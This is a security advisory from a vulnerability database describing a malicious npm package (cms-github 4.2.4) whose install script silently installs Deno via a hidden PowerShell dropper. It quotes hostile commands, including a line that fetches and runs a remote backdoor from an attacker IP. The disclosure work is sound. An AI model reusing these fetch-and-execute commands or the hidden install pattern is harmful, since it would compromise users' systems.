VDB

GCVE-110-OSM-2026-5125

GCVE-110-OSM-2026-5125
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published June 1, 2026
Executes a hidden PowerShell dropper at install time that installs scoop, winget, and Deno silently, then fetches and executes a remote Deno backdoor script from `http://77.90.185.225/de2079d13aa5d620.js`. Published by the same author (saihein321@gmail.com) behind confirmed backdoor package cms-helpgit. **Trigger** (`install`): `node install.js` runs at npm install time on Windows. **Stage 1 — dropper**: `install.js` writes an embedded PowerShell script to the system temp directory and executes it via `child_process.exec` with `-WindowStyle Hidden -ExecutionPolicy Bypass` and `windowsHide: true`. The script sets execution policy, installs scoop (via `irm get.scoop.sh | iex`, with admin-aware branch), uses scoop to install winget, then installs Deno silently via `winget install --id DenoLand.Deno --silent`. **Stage 2 — backdoor fetch**: After locating the Deno binary across multiple fallback paths (`LOCALAPPDATA\Microsoft\WinGet\Packages`, `USERPROFILE\scoop`), the script executes `& $deno -A "http://77.90.185.225/de2079d13aa5d620.js"` — fetching and running the remote backdoor payload with full Deno permissions (`-A`). **Cleanup**: The temp `.ps1` file is deleted after execution. **Attribution**: publisher `saihein321@gmail.com`; `index.js` identifies itself internally as `cms-helpgit` version `4.2.3`, confirming the two packages share the same codebase.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowncms-github4.2.4 (affected)

References

vendor

Browse GCVE Records

73,734 records in the GCVE database · Updated July 18, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›